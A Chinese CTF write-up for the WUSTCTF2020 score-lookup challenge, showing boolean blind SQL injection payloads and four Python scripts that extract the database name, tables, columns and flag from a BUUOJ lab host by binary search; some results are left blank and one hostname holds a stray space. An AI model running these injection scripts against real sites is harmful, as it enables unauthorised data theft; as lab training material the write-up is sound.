你爹刷题5
[WUSTCTF2020]颜值成绩查询
你👱🏻点进题目就看到这个
输入1试试
得到1伯昏
数字最多只能输到4
试了一下，很明显是 SQL 注入题目，先试试异或 1^1^1
插入sql语句
1^(ascii(substr((select(database())),1,1))>200)^1
大于 200 时就查询不到结果了，明显是布尔盲注
0^1 会显示 1 对应的内容
爆库名
import requests
import time

# Boolean-based blind extraction of database(), one character per outer
# iteration.  The server leaks one bit per request: the response body
# contains "your score is: 100" when the injected comparison is true.
# Defender's note: the traffic signature is a burst of near-identical GETs
# to /?stunum= that differ only in two integers; a parameterised query on
# the server side removes the oracle entirely.
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn/?stunum="
result = ""


def _code_at(position):
    """Binary-search the ASCII code of character `position` (1-based) of database().

    Search range is [32, 127].  Returns the narrowed value; 32 means no probe
    ever answered true, which the caller treats as end of string.
    """
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) >> 1
        probe = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (position, mid)
        resp = requests.get(url + probe)
        time.sleep(0.3)  # pacing between requests, kept from the original
        resp.encoding = "utf-8"
        if "your score is: 100" in resp.text:
            lo = mid + 1  # oracle said "greater than mid"
        else:
            hi = mid  # oracle said "at most mid"
    return lo


position = 0
while True:
    position += 1
    code = _code_at(position)
    if code == 32:
        break
    result += chr(code)
print(result)
库名为ctf
爆表
import requests
import time

# Same boolean oracle as the database() script, now aimed at the
# comma-joined list of table names in the current schema.  Each character
# costs roughly seven requests (binary search over 32..127), so the whole
# run is a long, regular burst of GETs — the kind of pattern rate limiting
# and request-similarity alerts are meant to catch.
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn/?stunum="
result = ""


def _oracle(position, threshold):
    """Return True when the server reports the character at `position` > `threshold`.

    The truth value is read from the presence of "your score is: 100" in the
    response body, after a fixed 0.3 s pause following each request.
    """
    probe = (
        "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)"
        % (position, threshold)
    )
    resp = requests.get(url + probe)
    time.sleep(0.3)
    resp.encoding = "utf-8"
    return "your score is: 100" in resp.text


def _characters():
    """Yield recovered characters in order; stop at the first position that narrows to 32."""
    position = 0
    while True:
        position += 1
        lo, hi = 32, 127
        while lo < hi:
            mid = (lo + hi) >> 1
            if _oracle(position, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 32:
            return
        yield chr(lo)


result = "".join(_characters())
print(result)
表名为
爆列名
import requests
import time

# Third pass of the same boolean oracle: column names of the `flag` table
# from information_schema.columns.  Note the doubled slash in the URL path
# ("//?stunum=") — kept verbatim from the page.
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn//?stunum="
result = ""

position = 0
chars = []
while True:
    position += 1
    lo, hi = 32, 127
    # Narrow the ASCII code of the character at `position` by halving the
    # interval; the server's "your score is: 100" marker is the comparison
    # result.
    while lo < hi:
        mid = (lo + hi) >> 1
        probe = (
            "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)"
            % (position, mid)
        )
        resp = requests.get(url + probe)
        time.sleep(0.3)
        resp.encoding = "utf-8"
        if "your score is: 100" in resp.text:
            lo = mid + 1
        else:
            hi = mid
    # A position that never answers "greater" narrows to 32: end of string.
    if lo == 32:
        break
    chars.append(chr(lo))
result = "".join(chars)
print(result)
列名为
爆字段
import requests
import time

# Final pass: read the `value` column of `flag` through the same
# one-bit-per-request oracle, this time keyed on the word 'admin' appearing
# in the response body.  Positions are capped at 99 by the for-loop.
# NOTE(review): the host part contains a space ("e28bbc98- c8fb"); this
# looks like a copy/paste artifact of the page and is kept verbatim.
url="http://e28bbc98- c8fb-4f48-8165-50f458b0ac6b.node4.buuoj.cn:81/?stunum="
name=''


def _recover_code(position):
    """Return the narrowed ASCII code for `position` (1-based), or 32 when the string has ended.

    Binary search over [32, 128): each probe asks "is the code greater than
    mid?" and treats 'admin' in the body as a true answer.
    """
    lo, hi = 32, 128
    mid = (lo + hi) // 2
    while lo < hi:
        probe = "0^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)" % (position, mid)
        resp = requests.get(url=url + probe)
        time.sleep(0.3)
        if 'admin' in resp.text:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    return mid


for index in range(1, 100):
    print(index)  # progress: which character position is being recovered
    code = _recover_code(index)
    if code == 32:
        break
    name = name + chr(code)
print(name)
得到flag